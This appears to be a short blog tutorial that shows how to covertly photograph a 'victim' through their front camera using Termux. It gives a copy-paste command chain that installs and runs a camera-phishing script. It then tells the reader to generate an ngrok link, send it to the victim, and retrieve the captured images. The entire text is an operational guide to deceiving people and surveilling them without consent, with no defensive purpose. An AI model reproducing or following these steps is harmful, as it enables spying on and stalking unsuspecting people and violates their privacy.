Hack Front camera using Termux
Today we are going to hack the camera of any device by just sending a link from termux. #Follow below steps 1. Make sure you installed Termux and updated it 2. Now open termux and do the following things. COPY PASTE:-
Command
apt-get update -y ; apt-get upgrade -y ; pkg install wget ; pkg install python -y ; pkg install python2 -y ; pkg install git -y ; pip install lolcat ; git clone https://github.com/noob-hackers/grabcam ; ls ; cd grabcam ; ls ; bash grabcam.sh
After
3. Now here Turn on your mobile HOTSPOT and wait for 5 seconds and select option 2 (NGROK) by typing 2 in your keyboard.
4. Now here don't turn off your HOTSPOT of the device until you will be done with your process completely. So, after that, you will get the ngrok link like this ex :- https://8b2dd000.ngrok.io
5. Now, copy that and send it to your victim and wait for, him to use that link when he opens that he will be asked to allow the camera permission and after that, his pictures will be captured and that will be stored in your device in termux. To view them
6. Stop the grabcam script by holding volume down + c in the keyboard. When the script stops. - then give command
ls
7. Now here you can see images in .png formate now to view them just apply this command.
mv (image name here with .png) /sdcard
ex :- mv Rannmods637363.png /sdcard
8. Now, go to your gallery and boom now you can view that captured image finally.
Comments
Post a Comment